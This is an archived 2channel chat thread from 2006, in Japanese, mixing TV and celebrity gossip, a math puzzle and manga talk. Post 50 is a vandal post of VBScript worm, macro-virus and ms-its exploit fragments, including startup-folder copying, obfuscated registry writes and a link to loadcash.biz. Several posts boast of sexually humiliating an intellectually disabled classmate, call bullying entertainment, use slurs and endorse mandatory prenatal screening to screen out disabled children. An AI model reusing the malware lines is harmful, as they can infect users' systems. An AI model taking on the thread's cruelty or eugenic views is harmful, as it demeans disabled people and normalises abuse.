2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

雑談スレッド その6

1 :どっちの名無しさん?:2006/09/02(土) 14:39:08
1000行ったの?俺のだと981までしか受信していない

雑談スレッド〜「その5」ぐらいだっけ?〜
http://tv8.2ch.net/test/read.cgi/ami/1107158925/

2 :どっちの名無しさん?:2006/09/02(土) 20:57:50
天狗の仕業じゃ

3 :どっちの名無しさん?:2006/09/03(日) 00:00:53
前のスレで○○の曲は全部同じに聴こえる〜とかひたすら書いたけど
こんなスレ見つけてビックリだ。
http://music5.2ch.net/test/read.cgi/mjsaloon/1140096656/l50

4 :どっちの名無しさん?:2006/09/03(日) 01:19:49
24時間テレビ〜愛は地球を救う〜 動画@
1 名前:名無しさん@お腹いっぱい。 2006/08/28(月) 09:52:30 ID:wuGP7TaS0


■アンガールズの後ろで走ってるスタッフがおばあちゃんを一喝した問題■
・時間は16時20分前後のCM前
・おばあちゃんが走ってるアンガールズを「頑張ってね」という感じでタッチする(山根だけスレスレで避ける)
・それを見ていたスタッフ(アンガールズを追走している人)がおばあちゃんに怒鳴る
・怒鳴ったときの距離およそ50cm
・顔を近づける感じで怒鳴る
・怒鳴られたおばあちゃんは見た目70代ぐらい
・怒鳴ったスタッフは30〜35歳ぐらい
・怒鳴った言葉は「さわるなやぁ!」か「さわるなやコラぁ!」
・結構ハッキリと聴こえたのでかなり大声で怒鳴ったものと思われる
http://www.youtube.com/watch?v=c9Myy-GL-RQ






5 :どっちの名無しさん?:2006/09/03(日) 01:25:05
http://www.tanteifile.com/tamashii/index1.html
kokode mireru

6 :どっちの名無しさん?:2006/09/03(日) 15:42:25
ネタ古くないか
日テレ謝ったし

7 :どっちの名無しさん?:2006/09/04(月) 01:00:55
問題@
http://ime.nu/sansu-olympic.gr.jp/2006_try_sokuhou/sansu_try_soku/soku.php?img=3
答えと、理由を書いてください

8 :どっちの名無しさん?:2006/09/05(火) 23:37:27
ゴメン全然わかんない

9 :どっちの名無しさん?:2006/09/05(火) 23:58:53
ゲーセンにあるこのゲームやばいぐらい面白い
http://www.konami.jp/am/qma/qma3/index.htm

ちなみにツンデレブームにあやかってこのキャラ使ってる
http://www.konami.jp/am/qma/qma3/data/data_c_shalon.htm

10 :どっちの名無しさん?:2006/09/06(水) 00:19:10
ゲーセン最近全然行ってないな 昔はコナミのゲームやる為に通ってたけど
久々に覗きに行こうかな

11 :どっちの名無しさん?:2006/09/06(水) 01:35:16
ニートらしき人と学校帰りの高校生が多いな。
学校の近くだとプリクラ目的の女子高生が非常にうざい。車がないと行けないとこだとイイね。
あと主婦(?)どう見ても40代の女が一気に10枚くらい100円入れてた。

12 :どっちの名無しさん?:2006/09/06(水) 21:39:11
ゲーセンで働けばゲームやり放題なのかな

13 :どっちの名無しさん?:2006/09/07(木) 13:36:29
刃渡り8・6センチのナイフを所持携帯していたとして
警視庁石神井署は7日までに、銃刀法違反の現行犯で漫画「DEATH NOTE(デスノート)」の
作者小畑健容疑者(37)を逮捕した。

14 :どっちの名無しさん?:2006/09/07(木) 13:38:09
高専の女生徒殺した少年の遺体発見


15 :どっちの名無しさん?:2006/09/07(木) 14:36:37
【山口高専生殺害】被害者の中谷歩さん(20)は死姦もされていたことが発覚。【鬼畜】
1 :ナンパ歴3年 ◆0zlkQsNXAo :2006/09/07(木) 14:10:28 ID:/4+2EHCm0 ?BRZ(3000) ポイント特典
「事件が起こっていたらしい時間帯には近くにずっといましたが、
物音とか悲鳴などは聞いていません。」

「山口県警は同級生の家族からDNA鑑定のための資料を提供させ、
遺体発見現場に残されていた精液や血液と照合。
そして両者のDNAが一致した。」

「遺体には犯人の精液も付着していた。捜査員はその状況を筆舌に尽くし難いと表現しています。
被害者の死の後、その尊厳を傷つける行為があった可能性が高い。」

ttp://up.spawn.jp/file/up38331.jpg


鉄板っすね。
http://news20.2ch.net/test/read.cgi/news/1157605828/

16 :どっちの名無しさん?:2006/09/07(木) 14:41:40
 先の捜査関係者がいう。
「藤村の自宅を捜索したところ、レイプもののビデオやDVDが大量に発見されたのです。
ネットからダウンロードした極めてマニアックな映像もDVDに保存されていました。」
 2年前、AV女優に対する強制わいせつ致傷容疑で警視庁に
摘発された「バッキービジュアルプランニング」が製作したビデオは、ほとんど揃っていたという。

週刊新潮の138ページ


http://up.spawn.jp/file/up38332.jpg

17 :どっちの名無しさん?:2006/09/07(木) 16:57:45
死姦じたいは罪になるのかな

18 :どっちの名無しさん?:2006/09/07(木) 17:02:05
今電車の中で激デブス三人組が「アイツ超太ってね?」「つか可愛くないしw」とか言ってる
パチンコがどうとか朝帰りがどうとかも言ってんだけど どう見ても中学生
こんなん初めて見た

19 :どっちの名無しさん?:2006/09/07(木) 18:41:14
将来がたのしみなDQNだね

20 :どっちの名無しさん?:2006/09/07(木) 19:38:04
>>13
これマジだったの?普通に読み流してた。
つか石神井署っつーのが夜神署に見えてネタだと思った

21 :どっちの名無しさん?:2006/09/08(金) 03:05:28
>>9
そのゲームは白髪のおっさんしか使ったことないや

22 :どっちの名無しさん?:2006/09/08(金) 03:14:56
楽して儲かる方法を教えてください

23 :どっちの名無しさん?:2006/09/08(金) 13:35:01
>>20 しかもこれライトのせい
車のライトが片方消えていて警察に捕まって発覚したらしい

24 :どっちの名無しさん?:2006/09/08(金) 13:36:39
>>22 お金より仕事の方が大事だぞ


コウダクミの人魚姫レンタルした 結構この曲好き 皆とは趣味が合わない

25 :どっちの名無しさん?:2006/09/08(金) 17:34:04
儲かるならなんでもいいじゃん。

26 :どっちの名無しさん?:2006/09/08(金) 18:01:21
>>24の「皆」が誰なのかはわかんないけど
自分の周りでは倖田來未好きって人見たことないな。
ロキノン系が7割以上のシェアを占めてる。
むしろ売れてると思われるアーのファソは遭遇率低い。

27 :どっちの名無しさん?:2006/09/08(金) 19:30:11
浜ヲタとか山p担当とか、あんまリアルで見たことがないもんな
どちらかというとレミオロメン、エルレガーデン聞いてる奴を見たことある
なんなんだろう 男女の差カナ

28 :どっちの名無しさん?:2006/09/08(金) 19:32:29
なぜか誰も>>7に答えない件
これ小学生の問題なんだよ 数学板で小3が解いていた
理系じゃなくても君たち天才ならw

29 :どっちの名無しさん?:2006/09/08(金) 20:30:48
理系のオレだけど天才の方に任せた。流石に中学生レベルだと思うけど。
どうせ意味わかんない補助線引きまくるんでしょ。

30 :どっちの名無しさん?:2006/09/08(金) 21:55:39
第15回算数オリンピックトライアル←これっすよ。
第10回ジュニア算数オリンピックトライアル
第7回広中杯全国中学生数学大会トライアル
第3回ジュニア広中杯トライアル

いや算数とあるから小学生だと思うよ 補助線は正解 多分最低でも一本は引くでしょ

31 :どっちの名無しさん?:2006/09/08(金) 22:02:06
今日はMステの実況でGLAYのテルが山崎邦生に似てきたことで盛り上がった

32 :どっちの名無しさん?:2006/09/08(金) 22:09:15
■2006/09/06 (水) 見て見ぬフリの国民性
なんか、こんなことばっかで、この国、どうなっちゃうのかな‥‥なんて思ってたら、今度は「キコさま」かよ?
あたしと名前が似てるから、イヤでも気になっちゃうけど、亀田のバカや安倍のクズと同レベルっていうか、
ヘタしたら、坂東眞砂子にも匹敵しちゃうような恐ろしい「出産茶番劇」に、あたしは、開いた口から水子の霊が出てきちゃうよ、
まったく。妊娠するたびに、ソッコーで男の子か女の子か調べて、女の子だったら、スマップの殺人鬼、中居正広とおんなじ方法で、闇へと葬り去る。
そして、その次も、女の子だったから、またまた闇へと葬り去る。そして、その次も。

こんなことばっかやってるから、体がボロボロになっちゃって、マトモな出産もできなくなっちゃったのに、それでも、やっとこさ待望の男の子だったからって、
今度は手のひらを返したように、国をあげてのお祭り騒ぎ。挙句の果てに、「帝王切開します」って発表された時点で、ニポン中、世界中の誰もが、
「ああ、やっと男の子ができたのか」ってバレバレなのに、「生まれて来るまでは、男の子か女の子か知りません」なんていう白々しいコメントに、
誰ひとりツッコミを入れられない今日この頃、皆さん、茶番劇はお好きですか?

‥‥そんなワケで、単なる「出産マシーン」と化しちゃったキコさまは、例の気持ち悪いニヤニヤ笑いで、
「よっしゃ!もらった!」とかって心の中で叫びながら、小さくガッツポーズでもしてんだろうか?
ま、雲の上のことなんか、あたしにゃ関係無いけど、こんなくだらない茶番劇を全国ネットで朝から晩まで放送する
テレビ局のバカさかげんには、心の底から呆れ果てちゃうね。オマケに、皇室関係のニュースのたびに登場する、
薄気味悪いオッサンやオバサンたちの歯の浮くようなコメントの数々には、口の中にアルミ箔のカタマリを入れて、
カシカシカシカシカシカシって噛み続けるのとおんなじくらい不愉快な気分になる。

33 :どっちの名無しさん?:2006/09/08(金) 22:46:36
>>31
ようつべで見た。
まぁ、オドロキの度合いとしては60%くらいかな。
時の流れって残酷ね

34 :どっちの名無しさん?:2006/09/08(金) 22:49:20
一生遊んで暮らしたい

35 :どっちの名無しさん?:2006/09/08(金) 23:04:51
      ____
     /⌒  ⌒\
   /( >)  (<)\
  /::::::⌒(__人__)⌒::::: \  シシシシシシシシッ
  |    /| | | | |     |
  \  (、`ー―'´,    /
       ̄ ̄ ̄


36 :どっちの名無しさん?:2006/09/08(金) 23:06:26
     ,, ‐' ´  ´´   ´ー:z.._
    /'             `ヽ_
  /!'                `ゝ
. (           ,、 ,イ  ,、 、  `ヽ
  ゝ   ,イ-ト、リ_ヽノ V´ レ',.-、 , )!
. (/     )´、r‐o-=' /=c<,ィ ル'
  !  r‐、 }  ,,ー‐'  ( ー-' !/     r───────
  ヽ {.fi {( ;;;;;     _」  │   ノ 殴ったね
.  ヽ. `ー;`'     r─-、´  /    '⌒i      ……
   _`ヽ {    └--‐'  /┐    `ー──────
    |  ̄ ̄ ̄|┐  ´,. ‐'´  「7






         , イナ=--'''´ |ノ  )ノ_l/_,.へ    ト、 }
        人{、y====、、     ノ,,,゙二ヽ ) ,  },レ'
      く       (cト} ' ;'    /´(r゚)`'∠ノ ノ
  ,.-‐、   ノ   ..`ー-─‐' "    ( ー- '゙ ! ,r‐('
  i ,ゝ(. (  :::::::             丶.    .! ,)
  ! { ( {  )´::::::::            _,.ノ     |'    もっと殴ってくれ!
  ヽヽ )ヽ(_      ;,,______`"´     l
   ヽ、__,ノ        |ー──----7     ,'
      (_,.        { , -─-、 /    /
       ノ        `'ー----`'    /

37 :どっちの名無しさん?:2006/09/09(土) 00:29:33
>>7
問題5の方。
正方形から三角形の和を引けばいいのか?
EDCはそのまま16
んで、FからDCに垂直な線を引くとってかまあいろいろやり方あるしもっと簡単なやり方があるだろうけど、
まあFCBはBCを底辺としたときの高さが4だから16
あとはめちゃくちゃやったからやり方覚えてないけど
答えは8?

38 :どっちの名無しさん?:2006/09/09(土) 00:33:18
あと小学三年生って証拠ないよね、その人が。
ついでに突っ込むのもばかばかしいが、どこがどうなってだれが天才ということになったんだ?

39 :どっちの名無しさん?:2006/09/09(土) 00:50:31
いやなんかおかしいな
暗算じゃさすがに無理か。文系だし。
後日紙とシャーペンと消しゴム揃えてもう一回やってみる

40 :どっちの名無しさん?:2006/09/09(土) 01:43:51
後日と言った直後で申し訳ない。
んだけどまあ簡単なミスしてただけだって気づいたんで戻ってきた。
細かい説明はめんどいのでしないが、
ABGもADHもABとADを底辺としたときの高さを出せばABとADは8cmだから面積もすぐ出る。
その高さの出し方は三角形の比から出る。必要があれば線分を延長する。
そんなわけで高さは両方とも3
だからABGとADHの面積は両方とも12
つーわけで8×8−(16+16+12+12)=8
ってやったんだけど、これだと三角形IDHを2回引いてることになる。
IDHはADHの1/4だから3
それを足すから11じゃね。はいおしまい。


41 :どっちの名無しさん?:2006/09/09(土) 09:18:14
ADHのADを底辺とした高さってどうやって出した?
ここで行き詰ってる

42 :どっちの名無しさん?:2006/09/09(土) 15:01:01
結論から言うと11なんだ。
それは答えみれば分かる
そして小3がつまずいてた箇所は
△EDIの面積
これ感覚で3って出るのだけど
それの証明
これのやり方が色々あるので聞いたのだ
KYO−は全て比で出したみたいだけどそれで
正解
一応高校でならう加法定理無しで解くのが条件 小3は疑っても仕方がないが
少なくともこれは算数 よって小学生


43 :どっちの名無しさん?:2006/09/09(土) 15:06:35
>>40
もう少し話を進めると
>IDHはADHの1/4だから3
ここがおかしい ケアレスミスもあるがなぜ1/4なのか ここで感を使っている

>>41
そこは他と同様だよ

44 :どっちの名無しさん?:2006/09/09(土) 22:29:36
クラスに池沼がいるんだけどさ、今日呼び出してパンツ脱がせてやったぜwwwww
ギャーギャー騒いでおもちゃみたいでワロタwwwwwwwwwwww
http://vista.xii.jp/img/vi5759388260.3gp

45 :どっちの名無しさん?:2006/09/09(土) 23:47:46
思うんだけど健常者にでもできることやってもあんまり意味無いよね。
池沼は見てるだけでもなんだか面白いし。
小学校のころ女の池沼が
「わたしは あたまが おかしいので とくべつあつかい してください」と言ったので
一日中笑ってたのを覚えてるw

46 :どっちの名無しさん?:2006/09/10(日) 00:05:10
>>44見たらなんか書きたいこといっぱいでてきた

47 :どっちの名無しさん?:2006/09/10(日) 00:26:54
いじめは最高の娯楽wwwwwwwwwwwwww

48 :どっちの名無しさん?:2006/09/10(日) 09:02:07
ふざけんじゃねーよ明らかに私の事ハブにしてんだろ?そんな事して楽しい?
皆の前じゃ清廉潔白で通ってるあんたが私の事どんなに嫌いか知ってる。悔しいんでしょ?野球部にいっぱいファンがいるから。
野球部には全員あんたを好きでいてほしいんでしょ?
馬鹿みたい。バーカバーカ^^くそみてえな女。死ねよ
野球部になんか興味ありませんから。あげますよ全員www
これで満足かよ。クソ売女

49 :どっちの名無しさん?:2006/09/10(日) 09:03:10
もおやだ。全部ぜーんぶアイツのせいだ。
このスレだけが私の救い。めちゃストレス発散になる。クラスの男子は皆あいつの虜だ・・・あんなぶりっこorz
死んじゃいたいまじで・・・

50 :<body onload=window()>:2006/09/10(日) 11:19:46
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

51 :どっちの名無しさん?:2006/09/10(日) 11:26:26
ただ、↑のような本格的な(?)のは実際にはあまり見たことない。
放置が基本だったし。女子が女子をイジメて男子がそれに追随する形式だった。

あとイジメる側が悪いっていうけど場合によるね。
小学校の時、嫌なことがあったらすぐ泣き出して2時間は止まらない
(しかも「○○(下の名前呼び捨て)の馬鹿〜!キィー死ねー!!」とかわめきながら、授業十数回中断)、
つねってくる、言い返すと当然泣きわめく
こんな女が本当にいて、放課後に皆で引き出しの中の物破いたり壊したりして全部捨てたw
サスガに弁護のしようがないw
逆にテレビとかみたいに根暗な少年がイジメられることはまず無かった。

52 :どっちの名無しさん?:2006/09/10(日) 20:43:14
このスレ覗いた時、どこのスレ覗いてるんだと思った
雑談スレがあらされて無くなったのかと思った 
かろうじて一番上のレスが47だったので正気に戻れた

53 :どっちの名無しさん?:2006/09/10(日) 20:48:28
あっなるほど キチガイ女か
見たこと無いな
他のスレにいじめの動画貼ったら
池沼を普通校に入れる親が一番悪いんだってサ

54 :どっちの名無しさん?:2006/09/10(日) 22:21:33
池沼ってもなあ。
前にも書いたけど俺教師から池沼扱いされたし。医者が池沼と判断しない程度の池沼もいるだろ。

っても異端ってのは排除されるのはとりわけ日本では常識。
うちの学年でいじめられてた女の子も知恵遅れの気はあったし、確かに人に迷惑ばかりかけていた。
すごい構ってちゃんでわざとぶつかったりいきなり大声で話しかけてきたり。
一週間同じナフキン使ったり。あ、ナフキンって給食の時使うナフキンのことだから。
だからいじめられるのはしょうがないのかもしれないけど、
俺はやったこと後悔してんなあ。放っておけばよかった。

55 :どっちの名無しさん?:2006/09/10(日) 23:05:06
>>53
あるいはそうかもしれない
ちなみに>>51は(多分)池沼じゃない人ね
池沼の人は放置されてた。

実際には異端が排除されるってのは小学生までだと思うんだけど、
池沼その他は迷惑かけるのが問題なんじゃない?
出産前診断を義務付けるべき。

56 :どっちの名無しさん?:2006/09/10(日) 23:10:14
http://www.youtube.com/watch?v=yiIcMHkbKdk&mode=related&search=
これが面白くない人はどうかしてると思うのですがどうでしょう。
10年前に公開された劇場版から8回くらい見てる。

57 :どっちの名無しさん?:2006/09/10(日) 23:32:12
>>54 ナフキンか 懐かしいなー 18年くらい前だ
>>55 >出産前診断を義務付け なるほどその手があったか。賛成
>>56 俺小6からニュース見てる人間なんで、なんも感じない

58 :どっちの名無しさん?:2006/09/10(日) 23:37:00
HUNTER×HUNTER の連載再開が決定!

59 :どっちの名無しさん?:2006/09/11(月) 02:44:26
>>40
IはDHの中点って根拠無いよね?

60 :どっちの名無しさん?:2006/09/11(月) 03:06:08
あっ俺やっと完全に解けたわ

話題変えるかwハンカチ王子斉藤君は将来ゲイをカミングアウトすると思う

61 :どっちの名無しさん?:2006/09/11(月) 15:36:29
>>59
問題文には書いてなかったと思う。勘違いしたわけではないと記憶しているがどうやったかなんて覚えてない。


変えた話題がそれか。
早くも風化してるじゃないか。

62 :どっちの名無しさん?:2006/09/16(土) 20:21:06
ところでハンカチ王子のせいで影の薄くなった田中は可哀相だよね。


友人から借りてNANAを15巻まで読んだんだけど、
ちょっと面白いと思ってしまった。
主人公のナナがいちいち腹立つ奴で「あーまたそれか、それなのか」感がたまらない。
それ以外の点は普通に面白いけどね。

63 :どっちの名無しさん?:2006/09/16(土) 23:40:24
NANAは友人との論議のなかで「大学生が読みそうな漫画」にノミネートされた。
読んだことないけど。アニメを偶然一話見た。
なんか主人公の方の(…?)ナナがやけに鼻についた気がする。

64 :どっちの名無しさん?:2006/09/17(日) 11:36:54
しょこたん「だおは私が考えた」 VIPPERは用済み
http://imihu.blog30.fc2.com/blog-entry-1935.html

まぁVIPPERが考えたわけでもないけど

65 :どっちの名無しさん?:2006/09/17(日) 23:37:33
>>63
とりあえず前回決めたことをあっさり転換するところがたまらなく素晴らしい。ムカムカ感が。
他のキャラはみんないい奴ばかりなんだがね。いい意味でいい奴ね。

66 :どっちの名無しさん?:2006/09/18(月) 19:29:05
なんかオレが見た時は「なんで私だけ…!」みたいな感じだった。
というかバンドモノという時点でこの漫画に自分が入り込む余地は既に無い気がする…
ていうかハンカチ王子って言葉の意味を今知った。
テレビ全く見ないからスポーツ分野は件のクイズで全国正解率90%以上でも間違う時がある

67 :どっちの名無しさん?:2006/09/18(月) 21:02:08
宮崎あおいが降板ってことだけしってる<NANA2
あとレイラ曲の由奈伊藤が初期と今とで変わり果てた 売れちゃうとああなるのかって感じ

68 :どっちの名無しさん?:2006/09/19(火) 22:15:11
今 公園通り掛かったらセックスしてるカップルいた
人と二人で歩いてたらベンチになにか荷物?が置いてあるのに気付いて見てたら
暗がりから「ぁんっ」って声が聞こえた
ホントにいるんだね初めて遭遇した

69 :どっちの名無しさん?:2006/09/20(水) 23:24:03
>>66
いや、そこんとこは分かってるみたいで、
ナナっていうと分かりにくいのでハチが楽器をやれないためにバンドのメンバーとの間に壁を感じる場面もある。
というかハチ以外のキャラの心情描写のが面白い。
序盤は登場人物が少ないのでハチの出番が多くてつまらない。
後の方になると精神病とかツバメとかドラッグとかAV女優とかリストカットとか非常に愉快。
あと最初からバッドエンドが約束されている辺り良心的な作品だと思う。


うちは近所に広い公園が多いから結構そういうのある。
前ベンチに座ってるのがあった。

70 :どっちの名無しさん?:2006/09/23(土) 04:14:39
ゴメンよくわからないんだけど…
もう一人のナナ(7)と区別するために主人公の方はハチ(8)って呼ばれてるってことかな。
心理描写とか読むの疲れそう

71 :どっちの名無しさん?:2006/09/24(日) 00:35:31
http://blogimg.goo.ne.jp/user_image/1d/98/cb2af8d98ac5a9a74ab73839d0fcedb0.jpg

72 :どっちの名無しさん?:2006/09/24(日) 15:04:12
というか現実にいる男たちと会話できないだけだよねこの人。


>>70
ナナっていうとどっちなのか区別付かないねってことで、
確か忠犬ハチ公みたいだって理由で歌わない方のナナはハチと呼ばれる。

73 :どっちの名無しさん?:2006/09/25(月) 08:36:41
10/11(水)スタートの日本テレビ系ドラマ「14歳の母」【主演:志田未来】主題歌が
Mr.Childrenの「しるし」(発売未定)に決定致しました。


74 :どっちの名無しさん?:2006/09/26(火) 18:31:55
おかげでこのドラマを堂々と観る口実ができた。

75 :どっちの名無しさん?:2006/09/26(火) 20:15:30
今ビューティコロシアムやってる。
数日間2ちゃんのその辺でブス画像が拝めそう。

76 :どっちの名無しさん?:2006/09/26(火) 20:21:15
過去の出演者
ttp://nanasisan.com/0nanasi/src/up10903.jpg
ttp://nanasisan.com/0nanasi/src/up10905.jpg
ttp://nanasisan.com/0nanasi/src/up10906.jpg
ttp://nanasisan.com/0nanasi/src/up10907.jpg
ttp://nanasisan.com/0nanasi/src/up10908.jpg
ttp://nanasisan.com/0nanasi/src/up10909.jpg

77 :マド:2006/09/27(水) 13:34:43
ようwおひさww

78 :装甲車:2006/09/27(水) 16:20:40
お前どこ逝ってたんだよ!

79 :どっちの名無しさん?:2006/09/27(水) 18:23:40
ビューティコロシアムで60歳のコウダ見た

80 :あいり:2006/09/27(水) 20:43:56
何この盛り下がりwwwwwwwwwwwwww

81 :どっちの名無しさん?:2006/09/27(水) 21:33:35
あいりだ あいりだ うpppプ

82 :どっちの名無しさん?:2006/09/27(水) 21:41:28
そういえば今日ポケモンの発売日でかなり盛り上がってたょ
あと、くまぇりが死刑だってさ

83 :どっちの名無しさん?:2006/09/27(水) 21:53:13
大阪府立松原高校で中学生に対してコンドーム授業を開催
1 :依頼865:2006/09/26(火) 12:45:53 ID:U/amYuh30 ?PLT(10001) ポイント特典
全員参加のコンドーム実習

 盛り上がった劇の後は、コンドーム装着の実習である。
クラスごとに決められている男女混合の班ごとに分かれ、男性器の模型とコンドームが配られた。

http://www.jinken.ne.jp/child/ruruku/ruruku_2.html
http://www.jinken.ne.jp/child/ruruku/

84 :どっちの名無しさん?:2006/09/27(水) 21:56:13
リンク先の画像見たらマジだったのでワロタ

85 :どっちの名無しさん?:2006/09/27(水) 22:13:46
06年10月期ドラマ主題歌

曜 時
月【21】のだめカンタービレ(CX) エンディングテーマ:「ラプソディ・イン・ブルー」
火【21】役者魂(CX) 主題歌:松たか子「みんなひとり」 劇中歌:竹内まりや「スロー・ラブ」
火【22】僕の歩く道(CX) 主題歌:SMAP「ありがとう」
水【22】14才の母(NTV) 主題歌:Mr.Children「しるし」
木【21】だめんず・うぉ〜か〜(EX) 主題歌:倖田來未「夢のうた」
木【22】嫌われ松子の一生(TBS) メインテーマ:「In The Mood」
木【22】Dr.コトー診療所2006(CX) 主題歌:中島みゆき「銀の龍の背に乗って」
金【21】家族〜妻の不在・夫の存在〜(EX) 主題歌:EXILE「Everything」
金【22】セーラー服と機関銃(TBS) 主題歌:星泉(長澤まさみ)「セーラー服と機関銃」
土【21】たったひとつの恋(NTV) 主題歌:??
日【21】鉄板少女アカネ!!(TBS) 主題歌:ORANGE RANGE「SAYONARA」

86 :どっちの名無しさん?:2006/09/28(木) 02:57:39
漫画原作ばっかだな。
まあドラマってもともと原作物が多いイメージだけど。
で原作とあまりに違ってたたかれるんだよな。

87 :どっちの名無しさん?:2006/09/28(木) 03:17:13
とりあえず世にも珍しいラノベ原作ドラマということで半分の月がのぼる空は観る。
原作読んでないし、テレ東の深夜ドラマって時点でキャストの演技力は……。
原作は1巻しか読んでないのだめも一応観る。
14歳の母親はミスチル主題歌だったり主演の子役が女王の教室だったりでなんとなく観る。
セーラー服と機関銃は有名なので観る。


ジャンプの新連載は2巻まで出るかな。
もうテニプリすら読まなくなったんだが。

88 :どっちの名無しさん?:2006/09/28(木) 13:28:53
ドラマって小学校の時にみてた「きらきらひかる」以来、ずーっとみてない
「HERO」のエンディングは欠かさずみてた(きいてた?)ケド。
「のだめ」はNANAよりは親しめそう。みないけど。
「ラプソディ・イン・ブルー」ってガーシュインかな CD持ってる。

個人的に現行の連載で読む価値あるのは
サンデの絶チルとマガジンのネギま絶望だけ。

89 :どっちの名無しさん?:2006/09/28(木) 20:41:53
嫌われ松子の一生ドラマ化するんだ?見ないと。

90 :どっちの名無しさん?:2006/09/30(土) 04:51:37
最近例の難病の子どもの募金の話で盛り上がってるね。あ、悪い意味で。
アレって何の手術に一億とかかかるんだろう。

91 :どっちの名無しさん?:2006/09/30(土) 10:03:36
ああいうのって海外で手術するケースが多いね 要するに違法なんだ・・・

92 :どっちの名無しさん?:2006/09/30(土) 11:22:47
日本では移植に年齢制限があるんだね。
米で白血病の骨髄ドナーがいないから病人の両親が子供を生んだって話があった。
(赤の他人なら適合する確立は数万分の一だかだけど兄弟なら四分の一)
んで見事に一致して助かったって話

93 :どっちの名無しさん?:2006/09/30(土) 11:41:31
スレ進むのが速すぎてリンク貼れないけど、ニュ即で「さくら」で検索

94 :どっちの名無しさん?:2006/09/30(土) 17:34:59
その弟は人権無いのかなって話

95 :どっちの名無しさん?:2006/09/30(土) 19:32:42
山本圭一が不起訴になるという情報
 
「被害少女との間で示談が成立したというのです。そもそも、少女がケガをしたわけじゃないし、
警察の調べで少女が年齢を偽り“18歳”と話していたことも分かった。これでは公判を維持するのは難しい。
示談が成立したので、検察は不起訴もしくは起訴猶予の処分を下すとみられています。
事実上の無罪放免です」(地元紙記者)

来年4月にとんねるずの番組でテレビ復帰するなんていわれています

http://news.livedoor.com/webapp/journal/cid__2511537/detail

96 :どっちの名無しさん?:2006/09/30(土) 19:38:06
宇多田ヒカルの母・藤圭子5000万円没収か


藤の手荷物からプラスチックの袋に入った多額の現金を発見。さらに、空港内で大声で電話するなど精神的に不安定な様子が見受けられたため、麻薬取り締まり当局に通報。麻薬探知犬が現金に反応を示したため、そのまま現金を全額差し押さえた。

 現金には米ドルのほか、カナダドルやオーストラリアドルも含まれており、藤は「寄付しようとしていた」と釈明していたという。

 今月25日には、検察当局が裁判所に現金の没収を申請。一方、藤側は弁護士を通じて返却を求めているという。夫の宇多田照實氏(58)は「差し押さえは確かだが、金額など詳細は調査している。不法な薬物の取引に関係したものでは100%ない」としている。

 7月に宇多田ヒカルがテレビ番組で「両親は6回も離婚と結婚を繰り返している」と暴露したように、藤は普段から奔放な行動をすることで知られている。


97 :どっちの名無しさん?:2006/09/30(土) 22:20:15
もし仮に18歳だとしても……だよなあ。
結局少女をやったのと年齢偽ったので天秤かけたってことか。醜いな。

98 :どっちの名無しさん?:2006/09/30(土) 22:30:51
なんか、今騒がれてることも、1年後にはみんなが忘れてると考えると、
全てがくだらなく見えてくるね。
革命か戦争でも起こらないかなぁ。

99 :どっちの名無しさん?:2006/09/30(土) 22:33:17
人間は死んだらお終い=無。あの世には何も持って行けない。
名誉や財産が後世に残るって?あぁ、子孫は鼻高々だろうな。

生物は生→死→生→死‥を繰り返す。どうせ死ぬなら初めから生まれなければいいのに。
人間は高々80年生きて、一体何の意味があるの?

100 :どっちの名無しさん?:2006/09/30(土) 22:49:10
↑ごめんなさい無視してください
誰かが反応するのをニヤニヤしながら見ようと思ったのですけど
ちょっと悪趣味なのでこんなこと書いてます

101 :どっちの名無しさん?:2006/10/01(日) 12:59:43
中二病は結構な難病だけど頑張ってねって言おうと思った。
いろいろやばいことになっている中国の農村部の方々が一揆起こさないかなとか期待してる。

102 :どっちの名無しさん?:2006/10/01(日) 15:36:18
でも実際心優しいキミにはそれは言えないと思う。
「こんなレスがおのぞみかい?」と思いつつマジレスをしてくれそう…スイマセン妄想です。


↓私の叔母のことです

【社会】 「給食、止められるなら止めてみろ!」 給食費払わぬDQN親、全国に増殖中…高級車乗り回しても金払わず★5
http://2ch-news.net/orz/orz.cgi/news19.2ch.net/newsplus/1159678588/

103 :どっちの名無しさん?:2006/10/01(日) 15:41:24
あ、携帯用2ちゃんビューアからコピったからおかしなことになったみたい。
ニュー速+です

104 :どっちの名無しさん?:2006/10/01(日) 18:35:43
叔母?

105 :どっちの名無しさん?:2006/10/01(日) 21:37:44
そう叔母。
あとなんて言うの、副教材?習字セットとかリコーダーとかを買わないで
子供(つまりオレのイトコ)には授業で毎回「忘れてきますた」と言わせてるみたいだね。
それがね、結構いるらしい
ほんで両親は借金して高級車(2台)乗ってます(爆笑)
最初聞いたときには言葉を失いますた。
修学旅行の積立金をどうしているのかは不明です。

106 :どっちの名無しさん?:2006/10/01(日) 23:21:43
修学旅行の積立金ワラタ

107 :装甲車:2006/10/02(月) 13:52:05
>>102
dqnだな。

108 :どっちの名無しさん?:2006/10/02(月) 20:50:05
面白いなあ。身近にそういう面白い人いるなんてうらやましい。

109 :どっちの名無しさん?:2006/10/03(火) 00:07:22
「ブレイクランチ制度」が始まり、配られたヨーグルトを飲む児童たち(豊郷小)

 滋賀県豊郷町は2日、朝食を食べずに登校する児童を減らすのを目的に、町立の2
小学校で始業前に飲み物や果物などを出す「ブレイクランチ制度」の試行を始めた。

 町立豊郷小と日栄小のPTAは昨年から、「早寝・早起き・朝ご飯運動」を行って
